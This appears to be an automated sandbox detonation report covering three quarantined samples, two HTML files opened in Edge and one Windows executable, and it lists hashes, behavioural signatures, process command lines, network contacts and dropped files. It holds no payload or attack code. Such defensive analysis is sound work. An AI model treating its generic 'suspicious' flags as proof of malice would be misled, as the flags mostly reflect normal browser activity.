SHA1 c1a9177ca9f272d89d264381600b3bb3048fbecd
SHA256 536a8ca805679545689b8934ae10f0c1c28eac9a4246ce9d8fb46bd5d57ad2f3
SHA512 681b1e35651d87bbf03011a7c3729186f9e1858f92719e0375d9db21e768be3fc9f10b0de1069be0451fc0b2cae100f42880f68326eec495728714956bbdc83e

Analysis: behavioral21

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

150s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1864 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1136 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 1136 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1864 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa405a46f8,0x7ffa405a4708,0x7ffa405a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,9564858806168380948,8445350512554345186,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5292 /prefetch:2

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9f4a0b24e1ad3a25fc9435eb63195e60
SHA1 052b5a37605d7e0e27d8b47bf162a000850196cd
SHA256 7d70a8fc286520712421636b563e9ee32335bca9a5be764544a084c77ddd5feb
SHA512 70897560b30f7885745fede85def923fb9a4f63820e351247d5dcbe81daab9dab49c1db03b29c390f58b3907d5025737a84fff026af2372c3233bc585dcfd284

\??\pipe\LOCAL\crashpad_1864_BHZSMGQVNFLXIUPY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4c9b7e612ef21ee665c70534d72524b0
SHA1 e76e22880ffa7d643933bf09544ceb23573d5add
SHA256 a64366387921aba157bba7472244791d5368aef8ecaf6472b616e1e130d7d05e
SHA512 e195e1ce5e7c06d193aa1f924d0079ea72b66eb22c3aea5b6811172251768f649368734e817996d9f0f72ddfd0e2bf2454aaee0bc650eaffd56fa125a334ae88

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7090de84491c5e1e8ec0d01346375245
SHA1 01985b812cd94660ead8147ab488bf165996c35c
SHA256 11c470bb14e6809cae3100ab36b25f5157016cba0e4de184dc40788f6e0f1117
SHA512 07a7484a32609db74c59c22c706b4f5f68de98b662a78cb2f7c95cd04ab162ad3ba1fd3da63c1a2697f9d0bb75b8a7aaa2b93da7f0dc7658eda90698d2bcea3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 abeab67aa0422831e5be2c4cc6babc67
SHA1 7b2d7a83d472a24248a15bf846a9abf434e4d0fd
SHA256 b7c0db367f35758b7083f790eea2c43d7a9b895b195ab3d68fc16c9d350152fa
SHA512 fc30f21a3a920bba27ae141d5d595e8829aa70202b333787d3d6bfb3ba26852688c11ce201eac9afb2db3d977a689a6e1d50311a4897177cb75a1808612a6c22

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ad300fb8424786dd9032c73a7f0e261e
SHA1 b761618d04225610947344db4a5b8226bb90ec00
SHA256 aeebe5f7bf4bca51199ef02ed02984155a16e361ee5100430065bcb224ea8969
SHA512 82ce22df63cbb63c3d58f942b69ea4bca392c084f67305c5f63744afd7f4bf571222d4d3118816e60f91f0cf4ac9d9ea75cff5c6334aed1f486d3502d519ad00

Analysis: behavioral29

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240729-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Network

N/A

Files

memory/2916-0-0x000000013F610000-0x000000013F7BE000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

139s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
